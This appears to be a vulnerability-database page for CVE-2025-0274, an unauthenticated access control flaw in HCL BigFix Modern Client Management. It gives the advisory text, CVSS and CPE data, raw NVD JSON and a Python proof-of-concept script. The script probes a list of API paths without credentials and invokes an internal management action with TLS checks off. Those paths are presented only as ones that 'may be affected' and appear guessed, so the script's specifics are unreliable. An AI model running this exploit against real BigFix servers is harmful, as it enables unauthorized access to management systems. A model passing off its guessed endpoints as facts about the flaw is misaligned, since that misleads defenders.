Security Vulnerability Report
中文
CVE-2025-0274 CVSS 5.3 MEDIUM

CVE-2025-0274

Published: 2025-10-16 05:15:36
Last Modified: 2025-10-21 18:21:11
Source: [email protected]

Description

HCL BigFix Modern Client Management (MCM) 3.3 and earlier is affected by improper access control. Unauthorized users can access a small subset of endpoint actions, potentially allowing access to select internal functions.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:hcltech:bigfix_mobile:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:hcltech:bigfix_modern_client_management:*:*:*:*:*:*:*:* - VULNERABLE
HCL BigFix Modern Client Management (MCM) <= 3.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-0274 PoC - HCL BigFix MCM Improper Access Control # This PoC demonstrates unauthorized access to restricted endpoint actions # Note: Replace the target URL with the actual BigFix MCM server address import requests import json TARGET_URL = "https://target-bigfix-mcm-server:443" # Step 1: Attempt to access restricted endpoint actions without authentication # The vulnerability allows unauthorized users to access a subset of endpoint actions def exploit_access_control(): """ Exploit improper access control in HCL BigFix MCM No authentication required (PR:N) """ session = requests.Session() # Common BigFix MCM API endpoints that may be affected restricted_endpoints = [ "/api/mcm/endpoint/actions", "/api/mcm/client/management", "/api/mcm/admin/internal", "/api/sam/v1/actions", "/api/mcm/endpoint/list", "/api/mcm/internal/functions", ] headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36", "Accept": "application/json", "Content-Type": "application/json" } print(f"[*] Targeting: {TARGET_URL}") print(f"[*] CVE-2025-0274 - Improper Access Control in BigFix MCM") print("-" * 60) for endpoint in restricted_endpoints: url = f"{TARGET_URL}{endpoint}" try: # Attempt access without any authentication credentials response = session.get(url, headers=headers, verify=False, timeout=10) if response.status_code == 200: print(f"[+] VULNERABLE: {endpoint}") print(f" Status: {response.status_code}") print(f" Response preview: {response.text[:200]}") elif response.status_code == 401 or response.status_code == 403: print(f"[-] Protected: {endpoint} (Status: {response.status_code})") else: print(f"[?] Unexpected response from {endpoint}: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[!] Error connecting to {endpoint}: {str(e)}") # Step 2: Attempt to invoke internal functions through accessible endpoints print("\n[*] Attempting to invoke internal management functions...") internal_action = { "action": "list_endpoints", "filter": {} } try: response = session.post( f"{TARGET_URL}/api/mcm/endpoint/actions", headers=headers, json=internal_action, verify=False, timeout=10 ) if response.status_code == 200: print(f"[+] Successfully invoked internal action without authentication!") print(f" Response: {json.dumps(response.json(), indent=2)[:500]}") except Exception as e: print(f"[!] Failed to invoke action: {str(e)}") if __name__ == "__main__": exploit_access_control() # Mitigation: # - Upgrade HCL BigFix MCM to version 3.4 or later # - Refer to HCL KB0124512 for official patch information # - Implement network segmentation to restrict access to BigFix MCM servers

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-0274", "sourceIdentifier": "[email protected]", "published": "2025-10-16T05:15:35.713", "lastModified": "2025-10-21T18:21:10.827", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "HCL BigFix Modern Client Management (MCM) 3.3 and earlier is affected by improper access control. Unauthorized users can access a small subset of endpoint actions, potentially allowing access to select internal functions."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:bigfix_mobile:*:*:*:*:*:*:*:*", "versionEndIncluding": "3.3", "matchCriteriaId": "97CEC651-375F-4FE8-B947-0A3D89FF0267"}, {"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:bigfix_modern_client_management:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.4", "matchCriteriaId": "251EA75C-E4D9-4A13-B13D-02DFF9E6161D"}]}]}], "references": [{"url": "https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0124512", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.